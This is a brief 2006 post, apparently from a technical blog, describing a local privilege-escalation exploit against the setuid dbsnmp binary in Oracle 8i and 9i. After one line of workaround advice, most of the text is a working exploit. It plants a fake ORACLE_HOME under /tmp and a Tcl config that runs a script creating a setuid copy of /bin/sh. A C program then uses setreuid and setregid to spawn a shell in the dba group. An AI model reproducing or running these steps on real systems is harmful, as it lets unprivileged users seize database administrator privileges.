21 March 2006
Dbsnmp setuid exploit
Setuid
Setting the setuid bit in an executable’s mode bits allows a non-privileged user to temporarily gain the privileges of another user. Many of Oracle’s executables have setuid set: oracle binary, dbsnmp, lsnrctl,...
The main workaround for setuid problem is removing the execute privilege from the “others� group.
If you run root.sh after the installation, dbsnmp will not be executable by group “other�. If you don't run root.sh or add the execute privilege to the "other" group, you are open to this exploit.
Example:
If dbsnmp executable (owned by root) has setuid and --x for the other (i.e. -rwsr-s--x ) , you can use this exploit on Oracle 8i or 9i to change user’s read group ID to oinstall or dba (whatever is the group of dbsnmp file):
$id
uid-1008(smith) gid=14(staff)
vi /tmp/cakehole
#!/bin/sh –p
cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh
export ORACLE_HOME=/tmp
mkdir -p /tmp/network/agent/config
vi /tmp/network/agent/config/nmiconf.tcl
#!/.../oratclsh
set n [ exec /tmp/cakehole ]
$ORACLE_HOME/bin/dbsnmp start
-rwsr-sr-x 1 smith dba 95316 Apr 28 11:31 /tmp/.sh OR
-rwsr-sr-x 1 smith oinstall 95316 Apr 28 11:31 /tmp/.sh
If you want to exploit /tmp/.sh, create a C program, for example called aaa.c:
main () {
setreuid (geteuid(),-1);
setregid (getegid(),-1);
execlp (“/bin/sh�,�/bin/sh�,0); /* or use system() */
}
$ id
uid=1008(smith) gid=11(dba)